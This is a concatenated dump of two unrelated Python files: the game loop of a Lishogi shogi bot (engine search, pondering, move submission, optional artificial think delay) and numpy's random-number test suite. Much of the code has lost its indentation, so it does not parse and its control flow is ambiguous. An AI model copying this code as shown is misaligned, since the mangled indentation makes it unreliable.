        best_move, ponder_move = engine.search_with_ponder(board, wtime, btime, winc, binc, True)
        ponder_results[game.id] = (best_move, ponder_move)
engine.set_time_control(game)
if len(board.move_stack) < 2:
while not terminated:
try:
if not play_first_move(game, engine, board, li):
deferredFirstMove = True
break
except (HTTPError) as exception:
if exception.response.status_code == 400: # fallthrough
break
else:
moves = game.state["moves"].split()
if not is_game_over(game) and is_engine_move(game, moves):
best_move = None
ponder_move = None
wtime = game.state["wtime"]
btime = game.state["btime"]
if board.turn == shogi.BLACK:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
            best_move, ponder_move = engine.search_with_ponder(board, wtime, btime, game.state["winc"], game.state["binc"])
engine.print_stats()
            if is_usi_ponder and ponder_move is not None:
ponder_board = copy.deepcopy(board)
ponder_board.push(shogi.Move.from_usi(best_move))
ponder_board.push(shogi.Move.from_usi(ponder_move))
ponder_usi = ponder_move
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, game.state["winc"], game.state["binc"]))
ponder_thread.start()
li.make_move(game.id, best_move)
while not terminated:
try:
binary_chunk = next(lines)
        except StopIteration:
break
try:
upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if u_type == "chatLine":
conversation.react(ChatLine(upd), game)
elif u_type == "gameState":
game.state = upd
moves = upd["moves"].split()
if len(moves) > 0 and len(moves) != len(board.move_stack):
board = update_board(board, moves[-1])
if not is_game_over(game) and is_engine_move(game, moves):
if config.get("fake_think_time") and len(moves) > 9:
delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015
accel = 1 - max(0, min(100, len(moves) - 20)) / 150
sleep = min(5, delay * accel)
time.sleep(sleep)
best_move = None
ponder_move = None
wtime = upd["wtime"]
btime = upd["btime"]
if board.turn == shogi.BLACK:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
if not deferredFirstMove:
                        if best_move is None:
                            logger.info("Searching for wtime {} btime {}".format(wtime, btime))
                            best_move, ponder_move = engine.search_with_ponder(board, wtime, btime, upd["winc"], upd["binc"])
engine.print_stats()
                            if is_usi_ponder and ponder_move is not None:
ponder_board = copy.deepcopy(board)
ponder_board.push(shogi.Move.from_usi(best_move))
ponder_board.push(shogi.Move.from_usi(ponder_move))
ponder_usi = ponder_move
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, upd["winc"], upd["binc"]))
ponder_thread.start()
li.make_move(game.id, best_move)
else:
play_first_move(game, engine, board, li)
deferredFirstMove = False
if board.turn == shogi.BLACK:
game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
else:
game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
except (HTTPError, ReadTimeout, RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as e:
if game.id in (ongoing_game["gameId"] for ongoing_game in li.get_ongoing_games()):
continue
else:
break
logger.info("--- {} Game over".format(game.url()))
engine.stop()
    if ponder_thread is not None:
ponder_thread.join()
ponder_thread = None
    # This can raise queue.Full, but that should only happen if we're not processing
    # events fast enough and in this case I believe the exception should be raised
control_queue.put_nowait({"type": "local_game_done"})
def play_first_move(game, engine, board, li):
moves = game.state["moves"].split()
if is_engine_move(game, moves):
# need to hardcode first movetime since Lishogi has 30 sec limit.
best_move = engine.first_search(board, 1000)
engine.print_stats()
li.make_move(game.id, best_move)
return True
return False
def play_first_book_move(game, engine, board, li, config):
pass
def get_book_move(board, config):
pass
def setup_board(game):
if game.variant_name == "From Position":
board = shogi.Board(makesfenfromfen(game.initial_fen))
else:
board = shogi.Board() # Standard
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def is_game_over(game):
return game.state["status"] != "started"
def update_board(board, move):
usi_move = shogi.Move.from_usi(makeusi(move))
if board.is_legal(usi_move):
board.push(usi_move)
else:
logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
return board
def intro():
return r"""
. _/\_
. //o o\\
. || || lishogi-bot %s
. || ||
. ||____|| Play on Lishogi with a bot
""" % __version__
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
format="%(asctime)-15s: %(message)s")
enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO)
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if args.u is True and is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
test_random.py | import warnings
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
class TestSeed:
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState,
np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
def test_multidimensional_pvals(self):
assert_raises(ValueError, np.random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, np.random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, np.random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, np.random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestSetState:
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
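        # (the legacy tuple is the current 5-tuple minus its last two entries,
        # has_gauss and cached_gaussian)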
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint:
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a sha256 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '509aea74d792fb931784c4b0135392c65aec64beee12b0cc167548a2c3d31e71',
'int16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'int32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'int64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'int8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404',
'uint16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'uint32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'uint64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'uint8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.sha256(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.sha256(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
        # When stored in Numpy arrays, `lbnd` is cast
        # as np.int64, and `ubnd` is cast as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
        # causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random(self):
np.random.seed(self.seed)
actual = np.random.random((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(np.random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(np.random.randint(0, -10, size=0).shape, (0,))
assert_equal(np.random.randint(10, 10, size=0).shape, (0,))
assert_equal(np.random.choice(0, size=0).shape, (0,))
assert_equal(np.random.choice([], size=(0,)).shape, (0,))
assert_equal(np.random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, np.random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, np.random.choice, a, p=p)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object), ("b", np.int32)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10, 5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
